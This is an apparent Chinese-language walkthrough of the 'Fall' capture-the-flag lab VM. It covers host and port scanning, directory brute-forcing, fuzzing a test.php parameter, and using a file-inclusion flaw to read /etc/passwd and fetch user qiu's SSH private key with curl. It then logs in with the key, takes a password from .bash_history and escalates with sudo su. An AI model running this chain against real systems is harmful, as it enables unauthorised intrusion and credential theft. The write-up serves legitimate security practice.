将靶机按照图中连接方式打开，fall在virtualBox中打开

 信息收集

 扫描得ip

arp-scan -l

 扫描端口

nmap -A -T4 -sV -p-

 扫描目录

gobuster dir -u http://192.168.117.160 -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

 一个一个试了后，在test.php发现提示缺少参数

 使用wfuzz爆破参数

wfuzz -u "http://192.168.56.101/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80 

扫出来了一个file参数给file参数传一个"/etc/passwd"，发现正常回显了，是文件包含漏洞.并且在这个passwd文件里还发现了一个qiu用户

http://192.168.2.128/test.php?file=/etc/passwd

 尝试利用文件包含来把qiu的ssh私钥显示出来，并且试着导出这个私钥文件

curl http://192.168.56.101/test.php?file=/home/qiu/.ssh/id_rsa > sa

 

 因为openssh的安全性，密钥文件权限需要给600才能够正常使用

 chmod 600 sa

 

 ls -al

 显示可以运行

 

 使用私钥登录qiu用户

 

 查看.bash_history历史记录文件

 发现密码"remarkablyawesomE"，用"sudo -l"看一下权限 

图中密码输入没显示出来，发现密码正确，并且拥有全部的sudo权限

 用"sudo su"命令提权

查看flag文件 

cat ~/remarks.txt